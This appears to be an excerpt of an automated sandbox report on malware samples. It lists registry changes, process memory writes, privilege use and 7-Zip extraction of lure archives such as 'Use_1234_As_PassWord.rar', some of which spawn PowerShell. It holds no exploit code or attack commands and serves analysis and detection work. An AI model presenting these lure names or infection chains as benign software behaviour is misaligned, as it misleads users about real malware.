Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe

Modifies registry class 64 IoCs

Processes:

BDMPEG1SETUP.EXEregsvr32.exebdcam.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\FilterData = 02000000010080ff020000000000000030706933000000000000000001000000000000000000000030747933000000006000000070000000317069330800000000000000010000000000000000000000307479330000000060000000800000006175647300001000800000aa00389b715000000000001000800000aa00389b710100000000001000800000aa00389b71	BDMPEG1SETUP.EXE
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\FriendlyName = "Bandicam MPEG-1 Video Decoder"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\ = "Bandicam MPEG-1 Video Decoder"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix\Shell	bdcam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32\ThreadingModel = "Both"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\ = "Bandicam MPEG-1 Audio Decoder"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters.dll"	BDMPEG1SETUP.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\FriendlyName = "Bandicam MPEG-1 Video Decoder"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\CLSID = "{89C4B786-A490-4A3E-AA70-E6A8C61D3689}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32	BDMPEG1SETUP.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\CLSID = "{89C4B786-A490-4A3E-AA70-E6A8C61D3689}"	BDMPEG1SETUP.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\FilterData = 02000000010080ff020000000000000030706933000000000000000001000000000000000000000030747933000000006000000070000000317069330800000000000000010000000000000000000000307479330000000060000000800000006175647300001000800000aa00389b715000000000001000800000aa00389b710100000000001000800000aa00389b71	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 02000000030000000000000001000000ffffffff
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters.dll"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\ = "Bandicam MPEG-1 Video Property"	BDMPEG1SETUP.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\FilterData = 02000000010080ff02000000000000003070693300000000000000000200000000000000000000003074793300000000700000008000000031747933000000007000000090000000317069330800000000000000010000000000000000000000307479330000000070000000a00000007669647300001000800000aa00389b714d50454700001000800000aa00389b714d50473100001000800000aa00389b7100000000000000000000000000000000	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\ = "Bandicam MPEG-1 Video Property"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\.bfix\ = "BANDICAM.bfix"	bdcam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32\ThreadingModel = "Both"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\CLSID = "{E2E7539A-CECF-4A6A-B187-939943ECEF05}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix\Shell\Open\Command	bdcam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\ = "Bandicam MPEG-1 Audio Decoder"	BDMPEG1SETUP.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\FilterData = 02000000010080ff02000000000000003070693300000000000000000200000000000000000000003074793300000000700000008000000031747933000000007000000090000000317069330800000000000000010000000000000000000000307479330000000070000000a00000007669647300001000800000aa00389b714d50454700001000800000aa00389b714d50473100001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix\Shell\Open	bdcam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\ = "Bandicam MPEG-1 Video Decoder"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters.dll"	BDMPEG1SETUP.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\ = "Bandicam MPEG-1 Audio Property"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\.bfix	bdcam.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix	bdcam.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix\DefaultIcon	bdcam.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix\DefaultIcon\ = "C:\\Program Files (x86)\\Bandicam\\bdfix.exe"	bdcam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters.dll"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32\ThreadingModel = "Both"	BDMPEG1SETUP.EXE
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\FriendlyName = "Bandicam MPEG-1 Audio Decoder"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000_CLASSES\BANDICAM.bfix\ = "BandiFix Recovery File"	bdcam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\CLSID = "{E2E7539A-CECF-4A6A-B187-939943ECEF05}"	BDMPEG1SETUP.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32	BDMPEG1SETUP.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exepowershell.exepowershell.exeAppLaunch.exeFull_Setup_Activated.exepowershell.exebdcam.exe6523.exe

pid	process
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
1536	powershell.exe
2548	powershell.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2556	AppLaunch.exe
2624	Full_Setup_Activated.exe
2100	powershell.exe
2856	bdcam.exe
2856	bdcam.exe
884	6523.exe
884	6523.exe
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

6523.exe

pid process

884 6523.exe

pid	process
884	6523.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

taskmgr.exe7zG.exe7zG.exe7zFM.exe7zFM.exe7zFM.exe7zFM.exe7zFM.exepowershell.exepowershell.exeBDMPEG1SETUP.EXEFull_Setup_Activated.exepowershell.exebdcam.exe

description	pid	process
Token: SeDebugPrivilege	2140	taskmgr.exe
Token: SeRestorePrivilege	2584	7zG.exe
Token: 35	2584	7zG.exe
Token: SeSecurityPrivilege	2584	7zG.exe
Token: SeSecurityPrivilege	2584	7zG.exe
Token: SeRestorePrivilege	2316	7zG.exe
Token: 35	2316	7zG.exe
Token: SeSecurityPrivilege	2316	7zG.exe
Token: SeSecurityPrivilege	2316	7zG.exe
Token: SeRestorePrivilege	2400	7zFM.exe
Token: 35	2400	7zFM.exe
Token: SeRestorePrivilege	1416	7zFM.exe
Token: 35	1416	7zFM.exe
Token: SeRestorePrivilege	1612	7zFM.exe
Token: 35	1612	7zFM.exe
Token: SeSecurityPrivilege	1612	7zFM.exe
Token: SeRestorePrivilege	1312	7zFM.exe
Token: 35	1312	7zFM.exe
Token: SeSecurityPrivilege	1312	7zFM.exe
Token: SeRestorePrivilege	2632	7zFM.exe
Token: 35	2632	7zFM.exe
Token: SeSecurityPrivilege	2632	7zFM.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeRestorePrivilege	616	BDMPEG1SETUP.EXE
Token: SeBackupPrivilege	616	BDMPEG1SETUP.EXE
Token: SeDebugPrivilege	2624	Full_Setup_Activated.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: 33	2856	bdcam.exe
Token: SeIncBasePriorityPrivilege	2856	bdcam.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe7zG.exe7zG.exe7zFM.exe7zFM.exe7zFM.exe7zFM.exe7zFM.exeinstall application.exeiexplore.exeiexplore.exebdcam.exe

pid	process
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2584	7zG.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2316	7zG.exe
2400	7zFM.exe
1416	7zFM.exe
1612	7zFM.exe
1612	7zFM.exe
1312	7zFM.exe
1312	7zFM.exe
2632	7zFM.exe
2632	7zFM.exe
2400	install application.exe
888	iexplore.exe
2372	iexplore.exe
2856	bdcam.exe

Suspicious use of SendNotifyMessage 51 IoCs

Processes:

taskmgr.exebdcam.exe

pid	process
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2140	taskmgr.exe
2856	bdcam.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

lic.exeinstall application.exeiexplore.exeIEXPLORE.EXEbdcam.exeiexplore.exeIEXPLORE.EXEbdcam.exe

pid	process
2316	lic.exe
2400	install application.exe
888	iexplore.exe
888	iexplore.exe
2752	IEXPLORE.EXE
2752	IEXPLORE.EXE
1860	bdcam.exe
2372	iexplore.exe
2372	iexplore.exe
960	IEXPLORE.EXE
960	IEXPLORE.EXE
2856	bdcam.exe
2856	bdcam.exe
2856	bdcam.exe
2856	bdcam.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

install application.exeNMNEXHSZTR.exeiexplore.exeIFOGKVBUZB.exebdcamsetup.exeBDMPEG1SETUP.EXEregsvr32.exeFull_Setup_Activated.exe

description	pid	process	target process
PID 2400 wrote to memory of 2272	2400	install application.exe	IFOGKVBUZB.exe
PID 2400 wrote to memory of 2272	2400	install application.exe	IFOGKVBUZB.exe
PID 2400 wrote to memory of 2272	2400	install application.exe	IFOGKVBUZB.exe
PID 2400 wrote to memory of 2272	2400	install application.exe	IFOGKVBUZB.exe
PID 2400 wrote to memory of 1540	2400	install application.exe	NMNEXHSZTR.exe
PID 2400 wrote to memory of 1540	2400	install application.exe	NMNEXHSZTR.exe
PID 2400 wrote to memory of 1540	2400	install application.exe	NMNEXHSZTR.exe
PID 2400 wrote to memory of 1540	2400	install application.exe	NMNEXHSZTR.exe
PID 1540 wrote to memory of 1536	1540	NMNEXHSZTR.exe	powershell.exe
PID 1540 wrote to memory of 1536	1540	NMNEXHSZTR.exe	powershell.exe
PID 1540 wrote to memory of 1536	1540	NMNEXHSZTR.exe	powershell.exe
PID 2400 wrote to memory of 888	2400	install application.exe	iexplore.exe
PID 2400 wrote to memory of 888	2400	install application.exe	iexplore.exe
PID 2400 wrote to memory of 888	2400	install application.exe	iexplore.exe
PID 2400 wrote to memory of 888	2400	install application.exe	iexplore.exe
PID 888 wrote to memory of 2752	888	iexplore.exe	IEXPLORE.EXE
PID 888 wrote to memory of 2752	888	iexplore.exe	IEXPLORE.EXE
PID 888 wrote to memory of 2752	888	iexplore.exe	IEXPLORE.EXE
PID 888 wrote to memory of 2752	888	iexplore.exe	IEXPLORE.EXE
PID 1540 wrote to memory of 2548	1540	NMNEXHSZTR.exe	powershell.exe
PID 1540 wrote to memory of 2548	1540	NMNEXHSZTR.exe	powershell.exe
PID 1540 wrote to memory of 2548	1540	NMNEXHSZTR.exe	powershell.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 2272 wrote to memory of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe
PID 1540 wrote to memory of 2676	1540	NMNEXHSZTR.exe	WerFault.exe
PID 1540 wrote to memory of 2676	1540	NMNEXHSZTR.exe	WerFault.exe
PID 1540 wrote to memory of 2676	1540	NMNEXHSZTR.exe	WerFault.exe
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 2884 wrote to memory of 616	2884	bdcamsetup.exe	BDMPEG1SETUP.EXE
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 616 wrote to memory of 884	616	BDMPEG1SETUP.EXE	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 884 wrote to memory of 2228	884	regsvr32.exe	regsvr32.exe
PID 2884 wrote to memory of 1860	2884	bdcamsetup.exe	bdcam.exe
PID 2884 wrote to memory of 1860	2884	bdcamsetup.exe	bdcam.exe
PID 2884 wrote to memory of 1860	2884	bdcamsetup.exe	bdcam.exe
PID 2884 wrote to memory of 1860	2884	bdcamsetup.exe	bdcam.exe
PID 2624 wrote to memory of 2100	2624	Full_Setup_Activated.exe	powershell.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\malware.zip
1⤵
PID:1732

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2140

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2752

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\malware\" -spe -an -ai#7zMap29703:72:7zEvent14886
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2584

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\malware\" -an -ai#7zMap27501:96:7zEvent22210
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2316

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\malware\APP PW 2023.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2400

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\malware\APP PW 2023.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1416

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\malware\Screen Recorder.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1612

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\malware\APP PW 2023.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1312

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\malware\Use_1234_As_PassWord.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2632

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:1500

C:\Users\Admin\Desktop\malware\APP PW 2023\lic.exe
"C:\Users\Admin\Desktop\malware\APP PW 2023\lic.exe"
1⤵
- Executes dropped EXE
